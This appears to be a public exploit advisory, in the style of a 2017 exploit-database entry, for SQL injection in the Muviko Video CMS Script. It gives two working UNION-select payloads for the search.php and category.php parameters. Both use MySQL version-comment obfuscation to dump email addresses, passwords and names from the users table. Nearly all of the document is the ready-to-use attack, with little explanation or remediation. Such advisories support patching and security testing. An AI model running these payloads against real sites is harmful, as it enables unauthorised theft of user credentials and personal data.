21 lines
No EOL
863 B
Text
21 lines
No EOL
863 B
Text
# # # # #
|
|
# Exploit Title: Muviko Video CMS Script - SQL Injection
|
|
# Google Dork: N/A
|
|
# Date: 08.02.2017
|
|
# Vendor Homepage: https://muvikoscript.com/
|
|
# Software Buy: https://codecanyon.net/item/muviko-movie-video-cms/19402086
|
|
# Demo: https://demo.muvikoscript.com/
|
|
# Version: N/A
|
|
# Tested on: Win7 x64, Kali Linux x64
|
|
# # # # #
|
|
# Exploit Author: Ihsan Sencan
|
|
# Author Web: http://ihsan.net
|
|
# Author Mail : ihsan[@]ihsan[.]net
|
|
# # # # #
|
|
# SQL Injection/Exploit :
|
|
# http://localhost/[PATH]/search.php?q=[SQL]
|
|
# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
|
|
# http://localhost/[PATH]/category.php?id=[SQL]
|
|
# -9999'+/*!50000union*/+select+1,concat_ws(0x3c62723e,email,0x3c62723e,password,0x3c62723e,name),3,4,5,6,7,8,9,10,11,12,13,14,15+from+users-- -
|
|
# Etc...
|
|
# # # # # |